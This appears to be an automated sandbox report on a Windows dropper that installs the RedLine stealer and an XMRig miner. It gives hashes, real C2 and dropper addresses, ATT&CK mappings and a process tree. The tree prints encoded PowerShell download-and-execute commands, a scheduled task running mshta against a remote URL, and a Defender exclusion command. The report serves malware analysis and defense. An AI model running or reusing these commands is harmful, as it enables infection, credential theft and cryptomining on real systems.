Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-01-2023 19:28

General

  • Target

    df34772d9dface6ac5f9b42d436c8d17d86c1fb918c595cdc4bcb6a3cac329eb.exe

  • Size

    35KB

  • MD5

    418f539b6c8b4978d973b373845fb78d

  • SHA1

    cc1330a736b9d4ef45952ad5a36d3a84cae7d68a

  • SHA256

    df34772d9dface6ac5f9b42d436c8d17d86c1fb918c595cdc4bcb6a3cac329eb

  • SHA512

    f94961e5a2cfa66054066990329ff98aae4625c827bd3f60d038b6c9f96f64468a7327247be2ab75568a66f8186890fbf5f296449bf690c2eb17594d7c19cdee

  • SSDEEP

    768:10Wv/hC8aODVBEj7dSDAy4r/wOPpdwMNhghy0q9:100U8aODVcQ4kmTghy0w

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/go.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/me.png

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://62.204.41.194/F1.exe

Extracted

Family

redline

Botnet

$

C2

31.41.244.135:19850

Attributes
  • auth_value

    66623f79e2af33286760f5dd6c4262dc

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\df34772d9dface6ac5f9b42d436c8d17d86c1fb918c595cdc4bcb6a3cac329eb.exe
    "C:\Users\Admin\AppData\Local\Temp\df34772d9dface6ac5f9b42d436c8d17d86c1fb918c595cdc4bcb6a3cac329eb.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4352
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2000
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /create /tn "OneDrive Standalone Update Task - S - 1 - 5 - 21 - 3301851721 - 4018334294 - 377670162 - 1001" /sc ONLOGON /tr "mshta http://62.204.41.194/c.html " /rl HIGHEST /f
        3⤵
        • Creates scheduled task(s)
        PID:4268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4476
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4532
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAbABoAG4AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE8AbgBlAEQAcgBpAHYAZQBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACIAJwApACAAPAAjAG0AeAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuACkAIAA8ACMAbQB0AHUAdAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGwAdwAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAbgB3AHEAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAG8AUwBsAGUAZQBwAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE8AbgBlAEQAcgBpAHYAZQBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBlAHEAcwAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdwBmAGkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3860
  • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
    C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:4864
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3000
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe "cvxjxkjice"
        3⤵
          PID:1388
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2264

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    1
    T1081

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Collection

    Data from Local System

    1
    T1005

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
      Filesize

      642B

      MD5

      0b4ce74a6163ae20974c8ba4fdd4f1fa

      SHA1

      3c645b8b4d9bd437e7f1f74c21304452245dba1c

      SHA256

      2267541e715084f5cda2c56fe4186d937b73a3bb8e31a5e87cdc351ab558d4e7

      SHA512

      d3dd26b2817f22f38acebe03f6487d01421dea27717ac352a03b1b4bfec990d80796458cf608aa25e932bb91cfeedd25d6ced51cf3e554fdc3a1164bc3e5805c

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      4657d33103230cb65e6d950f1281954e

      SHA1

      15f332f69317290d681feda5373aef79e63d9e61

      SHA256

      06e91ef608ab86ad75418f67380c644299a8a06bce669f2bf444ba59efa2fba3

      SHA512

      80ed0149e04db55ffd2aab2116fd7dccd01fa6954c90a76dd77d282eb83b82396bd2bbb8ce59e05616f4eff7420020305f47872afb43f35fe36553b2ff46f7c2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      4657d33103230cb65e6d950f1281954e

      SHA1

      15f332f69317290d681feda5373aef79e63d9e61

      SHA256

      06e91ef608ab86ad75418f67380c644299a8a06bce669f2bf444ba59efa2fba3

      SHA512

      80ed0149e04db55ffd2aab2116fd7dccd01fa6954c90a76dd77d282eb83b82396bd2bbb8ce59e05616f4eff7420020305f47872afb43f35fe36553b2ff46f7c2

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      9dc0bc7cbe112bdd0e6f0f67a4414ebc

      SHA1

      17ed529f6383cdab23d656f25f370e0e56130880

      SHA256

      8e2bc41619fca27426fe78c2719583e557b43df1e8ea4770ff3a23ebee6d4152

      SHA512

      2df0967ba00ee36a1b8d2c821b457e48efcc61d4f6ff967f532383f1d77b72ad18cfd512bef38f5ff097f9aa02f4699dfeb48274ef1ccda3e2874ca6b4758423

    • C:\Users\Admin\AppData\Roaming\NoSleep.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • C:\Users\Admin\AppData\Roaming\NoSleep.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
      Filesize

      4.4MB

      MD5

      da256d1a520061b14d1cd013d99e84ff

      SHA1

      1aad91448144852bd1bf83dcb85bd14c6db160da

      SHA256

      feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

      SHA512

      8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

    • memory/1388-173-0x0000017739CC0000-0x0000017739CD9000-memory.dmp
      Filesize

      100KB

    • memory/1388-183-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/1388-191-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/1608-145-0x0000000000000000-mapping.dmp
    • memory/2000-138-0x000001F3CC0D0000-0x000001F3CC0F2000-memory.dmp
      Filesize

      136KB

    • memory/2000-159-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/2000-137-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/2000-133-0x0000000000000000-mapping.dmp
    • memory/2264-178-0x000000014036EAC4-mapping.dmp
    • memory/2264-184-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/2264-194-0x00000248D69A0000-0x00000248D69C0000-memory.dmp
      Filesize

      128KB

    • memory/2264-193-0x00000248D69A0000-0x00000248D69C0000-memory.dmp
      Filesize

      128KB

    • memory/2264-177-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/2264-192-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/2264-179-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/2264-180-0x0000000140000000-0x0000000140809000-memory.dmp
      Filesize

      8.0MB

    • memory/2264-186-0x00000248D6920000-0x00000248D6960000-memory.dmp
      Filesize

      256KB

    • memory/2264-181-0x00000248D5030000-0x00000248D5050000-memory.dmp
      Filesize

      128KB

    • memory/2268-160-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/2268-155-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/2268-153-0x0000000000000000-mapping.dmp
    • memory/2932-150-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/2932-141-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/2932-134-0x0000000000000000-mapping.dmp
    • memory/3000-182-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/3000-170-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/3000-172-0x0000024ABBE50000-0x0000024ABBE62000-memory.dmp
      Filesize

      72KB

    • memory/3740-161-0x0000000005520000-0x0000000005B38000-memory.dmp
      Filesize

      6.1MB

    • memory/3740-187-0x00000000066A0000-0x00000000066BE000-memory.dmp
      Filesize

      120KB

    • memory/3740-168-0x0000000005010000-0x000000000504C000-memory.dmp
      Filesize

      240KB

    • memory/3740-156-0x0000000000400000-0x0000000000438000-memory.dmp
      Filesize

      224KB

    • memory/3740-166-0x00000000050E0000-0x00000000051EA000-memory.dmp
      Filesize

      1.0MB

    • memory/3740-190-0x0000000007A80000-0x0000000007FAC000-memory.dmp
      Filesize

      5.2MB

    • memory/3740-174-0x00000000060F0000-0x0000000006694000-memory.dmp
      Filesize

      5.6MB

    • memory/3740-175-0x0000000005420000-0x00000000054B2000-memory.dmp
      Filesize

      584KB

    • memory/3740-176-0x0000000005B40000-0x0000000005BA6000-memory.dmp
      Filesize

      408KB

    • memory/3740-189-0x0000000006C40000-0x0000000006E02000-memory.dmp
      Filesize

      1.8MB

    • memory/3740-188-0x0000000006A20000-0x0000000006A70000-memory.dmp
      Filesize

      320KB

    • memory/3740-157-0x000000000041837E-mapping.dmp
    • memory/3740-164-0x0000000004FB0000-0x0000000004FC2000-memory.dmp
      Filesize

      72KB

    • memory/3740-185-0x00000000069A0000-0x0000000006A16000-memory.dmp
      Filesize

      472KB

    • memory/3860-136-0x0000000000000000-mapping.dmp
    • memory/3860-143-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/3860-142-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/4268-144-0x0000000000000000-mapping.dmp
    • memory/4352-132-0x0000000000B60000-0x0000000000B70000-memory.dmp
      Filesize

      64KB

    • memory/4352-139-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/4476-162-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/4476-140-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/4476-135-0x0000000000000000-mapping.dmp
    • memory/4476-171-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/4532-165-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/4532-152-0x00007FF9F62F0000-0x00007FF9F6DB1000-memory.dmp
      Filesize

      10.8MB

    • memory/4532-151-0x000002AF87440000-0x000002AF8789B000-memory.dmp
      Filesize

      4.4MB